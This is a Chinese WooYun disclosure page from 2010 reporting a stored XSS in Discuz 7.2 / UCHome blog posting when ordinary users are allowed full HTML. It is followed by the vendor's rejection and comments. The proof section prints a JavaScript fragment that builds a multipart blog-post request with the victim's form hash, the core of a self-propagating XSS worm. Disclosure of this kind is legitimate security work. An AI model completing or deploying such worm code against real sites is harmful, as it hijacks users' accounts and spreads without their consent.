当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0931

漏洞标题:Discuz 7.2 存储型XSS

相关厂商:Discuz!

漏洞作者: Liscker

提交时间:2010-12-11 11:09

修复时间:2010-12-14 11:05

公开时间:2010-12-14 11:05

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-12-11: 细节已通知厂商并且等待厂商处理中
2010-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Discuz 7.2 存储型XSS,可编写蠕虫传播。

详细说明:

discuz 7.2 个人空间发表博客,默认管理员可编辑源码,但管理员可在后台设置权限允许普通用户编辑。
该处存在XSS弱点,可编写蠕虫进行传播。每个用户的表单hash值可在html获得,不需要考虑salt,获得cookie即可。

漏洞证明:

discuz 7.2 进行表单提交时每个用户的表单hash值不一样,但是固定的,该值可在访问用户的html中获得。如图:


然后将hash代入组包,编写蠕虫即可。
var userurl="http://demo.com/cp.php?ac=blog&blogid=&releas=2";
var fdata="-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"subject\"\n\n123\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"classid\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"message\"\n\n<DIV>123</DIV>\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"tag\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"friend\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"selectgroup\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"target_names\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"blogsubmit\"\n\ntrue\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"bbsis\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"fid\"\n\n4\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"formhash\"\n\n9186ab85\n-----------------------------7da26139230652--\n";
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7da26139230652");

修复方案:

你们经验更丰富。

版权声明:转载请注明来源 Liscker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2010-12-14 11:05

厂商回复:

后台用户组设置处:
日志全HTML标签支持处,已注明:
谨慎允许,支持所有html标签可能会造成javascript脚本引起的不安全因素 。
不认为这是一个漏洞。

漏洞Rank:3 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2010-12-11 11:11 | Liscker ( 普通白帽子 | Rank:195 漏洞数:28 )

    图片没传上去...补充:表单hash以隐藏变量方式<input type="hidden" name="formhash" value="9186ab85" />

  2. 2010-12-13 10:54 | Discuz!(乌云厂商)

    请问楼主,你的意思是?在UCHOME的后台,打开普通用户组的“日志全HTML标签支持”支持,将会导致跨站吗?cp.php ac=blog 这是UCHOME的action不是discuz的。

  3. 2010-12-14 09:38 | Liscker ( 普通白帽子 | Rank:195 漏洞数:28 )

    看你们都康盛创想的....

  4. 2010-12-14 11:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    建议扣除rank

  5. 2010-12-14 12:01 | Liscker ( 普通白帽子 | Rank:195 漏洞数:28 )

    不是吧。。。。。没危害。。。。管理员自己写蠕虫不算危害?某X省移动开了普通用户....无语

  6. 2010-12-14 16:04 | 少帅 ( 实习白帽子 | Rank:59 漏洞数:14 )

    哈哈哈.我支持小帅大哥.

  7. 2010-12-14 21:21 | anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)

    额,后台的.